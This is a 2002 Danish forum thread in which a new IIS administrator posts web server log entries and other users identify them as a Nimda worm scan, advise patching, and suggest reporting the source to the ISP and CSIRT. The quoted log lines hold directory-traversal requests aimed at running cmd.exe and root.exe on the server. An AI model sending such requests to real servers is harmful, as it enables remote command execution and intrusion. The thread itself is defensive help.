Avatar billede riversen Nybegynder
16. september 2002 - 07:16 Der er 11 kommentarer og
1 løsning

IIS Log

Er ny indenfor webserver.

Jeg ville lige prøve at kigge i loggen og lægger mærke til følgende linier

2002-09-15 19:05:09 80.198.31.44 - 192.168.1.10 80 GET /scripts/root.exe /c+dir 404 -
2002-09-15 19:05:09 80.198.31.44 - 192.168.1.10 80 GET /MSADC/root.exe /c+dir 403 -
2002-09-15 19:05:10 80.198.31.44 - 192.168.1.10 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:05:10 80.198.31.44 - 192.168.1.10 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:05:11 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:05:11 80.198.31.44 - 192.168.1.10 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:05:11 80.198.31.44 - 192.168.1.10 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:05:11 80.198.31.44 - 192.168.1.10 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-09-15 19:05:13 80.198.31.44 - 192.168.1.10 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:05:13 80.198.31.44 - 192.168.1.10 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:05:14 80.198.31.44 - 192.168.1.10 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:05:14 80.198.31.44 - 192.168.1.10 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:05:15 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:05:15 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:05:15 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:05:16 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:10:56 80.198.31.44 - 192.168.1.10 80 GET /scripts/root.exe /c+dir 404 -
2002-09-15 19:10:56 80.198.31.44 - 192.168.1.10 80 GET /MSADC/root.exe /c+dir 403 -
2002-09-15 19:10:56 80.198.31.44 - 192.168.1.10 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:10:56 80.198.31.44 - 192.168.1.10 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:10:58 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:10:58 80.198.31.44 - 192.168.1.10 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:10:58 80.198.31.44 - 192.168.1.10 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:10:59 80.198.31.44 - 192.168.1.10 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-09-15 19:10:59 80.198.31.44 - 192.168.1.10 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:10:59 80.198.31.44 - 192.168.1.10 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:10:59 80.198.31.44 - 192.168.1.10 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:11:00 80.198.31.44 - 192.168.1.10 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-09-15 19:11:00 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:11:00 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:11:00 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 19:11:00 80.198.31.44 - 192.168.1.10 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-09-15 20:34:45 212.237.190.95 - 192.168.1.10 80 GET /index.html - 304 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0)

den sidste linie er mig der har været inde på siden...men hvad er de andre? De optræder hyppigt med forskellige ip-adresser.
Avatar billede bufferzone Praktikant
16. september 2002 - 09:14 #1
Jeg synes det ligner et Nimda angreb, men kan selvfølgelig også være et script der er kørt af mod dig. Jeg er dog ret sikker på Nimda
Avatar billede bocker Nybegynder
16. september 2002 - 09:44 #2
Har du installeret alle sikkerhedsopdateringer på din server?
Avatar billede bocker Nybegynder
16. september 2002 - 09:44 #3
Anyway, meld ip'en til ejeren, og send loggen med...
Avatar billede riversen Nybegynder
16. september 2002 - 11:11 #4
virusscanner har ikke brokket sig...
Avatar billede riversen Nybegynder
16. september 2002 - 11:14 #5
er patch ikke med i sp3?
Avatar billede bocker Nybegynder
16. september 2002 - 12:50 #6
Jo, men jeg tænkte på at der var en exploit for noget tid tilbage, hvor man kunne gå ind og bruge cmd.exe via iis... Så hvis du ikke havde fået installeret alle service packs / patches kunne det være det.
Avatar billede bocker Nybegynder
16. september 2002 - 12:53 #7
remarks:      +---------------------------------------+
remarks:      | For abuse and security issues contact |
remarks:      | csirt@csirt.dk, http://www.csirt.dk  |
remarks:      +---------------------------------------+

Hvis du slår IP'en op på www.ripe.net under Whois DB, kan du se det er en TDC ip, så skriv til adressen herover, så kan de nok finde ud af om det er en med virus, der sidder i den anden ende.
Avatar billede riversen Nybegynder
16. september 2002 - 13:55 #8
jeg har snakket med tdc, så de gør vidst noget ved det.

Jeg kunne også se det var tdc kunde via tracert kommandoen

Han har med sikkerhed nimda... hold jer fra http://80.198.31.44/index.asp !!!

faktisk kan jeg tilgå hans pc via ip'en, så han har et seriøst sikkerhedsproblem.
Avatar billede riversen Nybegynder
16. september 2002 - 13:55 #9
bocker: jeg har installeret alt under windows update...er det ok? eller hvor kan jeg få fat i den patch du snakker om
Avatar billede bocker Nybegynder
16. september 2002 - 14:06 #10
Du burde være sikret så, den var med i en af de seneste SP.
Avatar billede riversen Nybegynder
16. september 2002 - 14:27 #11
ok...virusscanneren burde vel også afvise. De undrer mig bare at der er mangel forskellige ip-adresser, men jeg må lige tjekke det nærmere, når jeg kommer hjem...så jeg kan få et overblik over omfanget
Avatar billede riversen Nybegynder
16. september 2002 - 14:34 #12
mangel = mange :-)
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
IT-kurser om Microsoft 365, sikkerhed, personlig vækst, udvikling, digital markedsføring, grafisk design, SAP og forretningsanalyse.

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester